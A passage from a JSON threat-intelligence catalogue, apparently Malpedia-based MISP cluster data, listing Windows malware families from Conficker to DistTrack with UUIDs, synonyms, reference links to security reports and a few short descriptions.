- "uuid": "db370ffc-c3d2-42fc-b45b-f777d69f98c5",
- "value": "concealment_troy",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "downadup",
- "traffic converter"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker",
- "http://contagiodump.blogspot.com/2009/05/win32conficker.html"
- ]
- },
- "uuid": "5f638985-49e1-4059-b2eb-f2ffa397b212",
- "value": "Conficker",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius",
- "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/",
- "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/"
- ]
- },
- "uuid": "fe43c7e6-1d62-4421-9d85-519f53e8073f",
- "value": "Confucius",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee",
- "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks"
- ]
- },
- "uuid": "4181ebb5-cce9-4fb1-81a1-c3f34cb643de",
- "value": "Contopee",
- "description": ""
- },
- {
-
"meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag",
- "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
- ]
- },
- "uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b",
- "value": "CookieBag",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot",
- "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf",
- "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/",
- "http://blog.deepinstinct.com/2017/11/08/a-deeper-dive-into-corebots-comeback/"
- ]
- },
- "uuid": "495377c4-1be5-4c65-ba66-94c221061415",
- "value": "Corebot",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
- "http://malware.prevenity.com/2014/08/malware-info.html",
- "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html"
- ]
- },
- "uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e",
- "value": "Coreshell",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore",
- "https://blogs.forcepoint.com/security-labs/cradlecore-ransomware-source-code-sale"
- ]
- },
- "uuid": "6fb5bfff-4b10-43a4-ad3c-a1578f39e83e",
- "value": "CradleCore",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Crash",
- "Industroyer"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.crashoverride",
- "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf",
-
"https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/",
- "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf"
- ]
- },
- "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6",
- "value": "CrashOverride",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor",
- "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/"
- ]
- },
- "uuid": "ac75d0a3-bb99-4453-9567-a6c8ba87a706",
- "value": "Credraptor",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs"
- ]
- },
- "uuid": "e8682902-7748-423a-8ba9-6f00d9fe7331",
- "value": "Crenufs",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson",
- "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF"
- ]
- },
- "uuid": "a61fc694-a88a-484d-a648-db35b49932fd",
- "value": "Crimson",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.crisis",
- "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html",
- "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines",
- "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?"
- ]
- },
- "uuid": "4b2ab902-811e-4b50-8510-43454d77d027",
- "value": "Crisis",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl",
- "https://hackmag.com/security/ransomware-russian-style/",
- "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/",
- "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx",
- "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware",
- "https://twitter.com/demonslay335/status/971164798376468481"
- ]
- },
- "uuid": "32fa6c53-b4fc-47f8-894c-1ea74180e02f",
- "value": "Cryakl",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker"
- ]
- },
- "uuid": "980ea9fa-d29d-4a44-bb87-0c050f8ddeaf",
- "value": "CryLocker",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/",
- "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/"
- ]
- },
- "uuid": "2fe1dd8c-23d8-40a6-b042-bd2c4012fea6",
- "value": "CrypMic",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker",
- "http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html"
- ]
- },
- "uuid": "38b38f8c-944d-4062-bf35-561e8a81c8d2",
- "value": "Crypt0l0cker",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker",
- "https://www.secureworks.com/research/cryptolocker-ransomware",
-
"https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware"
- ]
- },
- "uuid": "c5a783da-9ff3-4427-84c5-428480b21cc7",
- "value": "CryptoLocker",
- "description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins."
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck",
- "http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/"
- ]
- },
- "uuid": "3ec67717-acd5-401b-8e9f-47e79edd07a0",
- "value": "CryptoLuck",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "CryptFile2"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix",
- "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/",
- "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/"
- ]
- },
- "uuid": "55d5742e-20f5-4c9a-887a-4dbd5b37d921",
- "value": "CryptoMix",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptorium",
- "https://twitter.com/struppigel/status/810770490491043840"
- ]
- },
- "uuid": "b7240444-94a6-4d57-a6b3-ca38182eff7a",
- "value": "Cryptorium",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield",
- "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/",
-
"http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/"
- ]
- },
- "uuid": "6855c491-1b18-4414-9e78-8bc17f0b5b98",
- "value": "CryptoShield",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler",
- "https://www.bleepingcomputer.com/news/security/cryptoshuffler-stole-150-000-by-replacing-bitcoin-wallet-ids-in-pc-clipboards/"
- ]
- },
- "uuid": "87048a24-7339-4d4e-a141-661cd32a6f1d",
- "value": "CryptoShuffler",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall"
- ]
- },
- "uuid": "1cb63b32-cc65-4cdc-945a-e06a88cdd94b",
- "value": "Cryptowall",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowire",
- "https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/"
- ]
- },
- "uuid": "bc0c1e48-102c-4e6b-9b86-c442c4798159",
- "value": "CryptoWire",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress",
- "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/",
- "https://www.lexsi.com/securityhub/cryptofortress/?lang=en",
- "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html"
- ]
- },
- "uuid": "ae4aa1ef-4da0-4952-9583-9d47f84edad9",
- "value": "CryptoFortress",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_ransomeware",
- "https://twitter.com/JaromirHorejsi/status/818369717371027456"
- ]
- },
- "uuid": "2f65f056-6cba-4a5b-9aaf-daf31eb76fc2",
- "value": "CryptoRansomeware",
-
"description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptxxxx",
- "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/"
- ]
- },
- "uuid": "fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8",
- "value": "CryptXXXX",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.csext",
- "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
- ]
- },
- "uuid": "c6a46f63-3ff1-4952-8350-fad9816b45c9",
- "value": "CsExt",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Windshield?"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe",
- "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
- "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal",
- "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html",
- "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3451"
- ]
- },
- "uuid": "1dc53eb8-ffae-4823-9c11-3c01514398b9",
- "value": "Cuegoe",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry",
- "https://www.secureworks.com/blog/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761"
- ]
- },
- "uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09",
- "value": "Cueisfry",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet",
- "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html"
- ]
- },
- "uuid": "8945d785-9d43-49ee-b210-4adeb8a24ab9",
- "value": "Cutlet",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
-
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail"
- ]
- },
- "uuid": "9e8655fc-5bba-4efd-b3c0-db89ee2e0e0b",
- "value": "Cutwail",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Rebhip"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate",
- "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
- ]
- },
- "uuid": "062d8577-d6e6-4c97-bcac-eb6eb1a50a8d",
- "value": "CyberGate",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyber_splitter"
- ]
- },
- "uuid": "8bde6075-8c5b-4ff1-be9a-4e2b1d3419aa",
- "value": "CyberSplitter",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot",
- "https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/"
- ]
- },
- "uuid": "dcdd98a7-aad2-4a96-a787-9c4665bbb1b8",
- "value": "CycBot",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy",
- "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
- ]
- },
- "uuid": "92960f1f-5099-4e38-a177-14a5e3b8d601",
- "value": "Dairy",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot",
- "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/",
- "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/",
- "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns",
-
"https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/"
- ]
- },
- "uuid": "4f7decd4-054b-4dd7-89cc-9bdb248f7c8a",
- "value": "DanaBot",
- "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on \u201cquality over quantity\u201d in email-based threats. DanaBot\u2019s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. "
- },
- {
- "meta": {
- "synonyms": [
- "Fynloski",
- "klovbot"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet",
- "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/",
- "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/",
- "https://darkcomet.net",
- "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html"
- ]
- },
- "uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591",
- "value": "DarkComet",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi",
- "http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html",
- "http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html"
- ]
- },
- "uuid": "3521faaa-1136-4e50-9fe2-3f33359e8b1d",
- "value": "DarkMegi",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Chymine"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon",
- "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html",
-
"http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html",
- "https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml"
- ]
- },
- "uuid": "81ca4876-b4a4-43e9-b8a9-8a88709dd3d2",
- "value": "Darkmoon",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar",
- "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/"
- ]
- },
- "uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0",
- "value": "DarkPulsar",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell",
- "https://www.arbornetworks.com/blog/asert/darkshell-a-ddos-bot-targetting-vendors-of-industrial-food-processing-equipment/"
- ]
- },
- "uuid": "7fcb9d77-a685-4705-86f0-e62a7302e836",
- "value": "DarkShell",
- "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry."
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky",
- "https://blog.radware.com/security/2018/02/darksky-botnet/",
- "http://telegra.ph/Analiz-botneta-DarkSky-12-30",
- "https://github.com/ims0rry/DarkSky-botnet"
- ]
- },
- "uuid": "d5f2e3c4-adf4-4156-98b1-b207f70522bb",
- "value": "Darksky",
- "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. 
The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server."
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkstrat",
- "https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/"
- ]
- },
- "uuid": "b9692126-e6e9-4ab3-8494-959fd1269ff4",
- "value": "DarkStRat",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila",
- "https://securelist.com/dark-tequila-anejo/87528/"
- ]
- },
- "uuid": "374080b4-5e6c-4992-a7f5-def1f2975494",
- "value": "DarkTequila",
- "description": "Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars."
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat",
- "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml",
- "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html"
- ]
- },
- "uuid": "fc91803f-610c-4ad5-ba0c-b78d65abc6db",
- "value": "Darktrack RAT",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Muirim",
- "Nioupale"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf",
- "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
- "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
- ]
- },
- "uuid": "70f6c71f-bc0c-4889-86e3-ef04e5b8415b",
- "value": "Daserf",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper",
- "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
- "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html"
- ]
- },
- "uuid": "827490bf-19b8-4d14-83b3-7da67fbe436c",
- "value": "Datper",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong",
- "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
- ]
- },
- "uuid": "cae8384d-b01b-4f9c-a31b-f693e12ea6b2",
- "value": "DDKONG",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
-
"https://malpedia.caad.fkie.fraunhofer.de/details/win.decebal",
- "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf",
- "https://community.softwaregrp.com/t5/Security-Research/POS-malware-a-look-at-Dexter-and-Decebal/ba-p/272157",
- "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html"
- ]
- },
- "uuid": "fba088fb-2659-48c3-921b-12c6791e6d58",
- "value": "Decebal",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas",
- "https://www.arbornetworks.com/blog/asert/pivoting-off-hidden-cobra-indicators/"
- ]
- },
- "uuid": "0be67307-670d-4558-bcf7-1387047bca4b",
- "value": "Delta(Alfa,Bravo, ...)",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.dented"
- ]
- },
- "uuid": "0404cb3e-1390-4010-a368-80ee585ddd59",
- "value": "Dented",
- "description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added."
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog",
- "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html"
- ]
- },
- "uuid": "ff4254e5-f301-4804-9a0f-e010af56576c",
- "value": "DeputyDog",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.deria_lock",
- "https://twitter.com/struppigel/status/812601286088597505"
- ]
- },
- "uuid": "52e0bcba-e352-4d7b-82ee-9169f18dca5a",
- "value": "DeriaLock",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf",
- "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf",
- "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/"
- ]
- },
- "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5",
- "value": "Derusbi",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.devils_rat"
- ]
- },
- "uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631",
- "value": "Devil's Rat",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "LusyPOS"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter",
- "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25658/en_US/McAfee_Labs_Threat_Advisory-LusyPOS.pdf",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/",
- "https://blog.fortinet.com/2014/03/10/how-dexter-steals-credit-card-information",
- "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html",
-
"http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/",
- "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html"
- ]
- },
- "uuid": "f44e6d03-54c0-47af-b228-0040299c349c",
- "value": "Dexter",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.de_loader",
- "https://blog.fortinet.com/2016/06/21/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users",
- "https://blogs.forcepoint.com/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks",
- "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware"
- ]
- },
- "uuid": "d0c6df05-8d89-4ce8-8ea2-8a4f617fa8f2",
- "value": "DE Loader",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Crysis",
- "Arena"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma",
- "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/"
- ]
- },
- "uuid": "9c90b876-e94d-4ea5-9f30-fdc6dd6b5aef",
- "value": "Dharma",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Crystal",
- "Gorynych",
- "Gorynch"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox",
- "https://www.scmagazine.com/inside-diamondfox/article/578478/",
- "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/",
- "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/",
- "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/",
- "https://blog.cylance.com/a-study-in-bots-diamondfox"
- ]
- },
- "uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665",
- "value": "DiamondFox",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
-
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie",
- "http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/"
- ]
- },
- "uuid": "8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5",
- "value": "Dimnie",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt",
- "https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/",
- "https://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf"
- ]
- },
- "uuid": "61b2dd12-2381-429d-bb64-e3210804a462",
- "value": "DirCrypt",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack",
- "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis",
- "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412",
- "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
- "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware",
- "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/",
- "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html"
- ]
- },
- "uuid": "25d03501-1fe0-4d5e-bc75-c00fbdaa83df",
- "value": "DistTrack",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker",
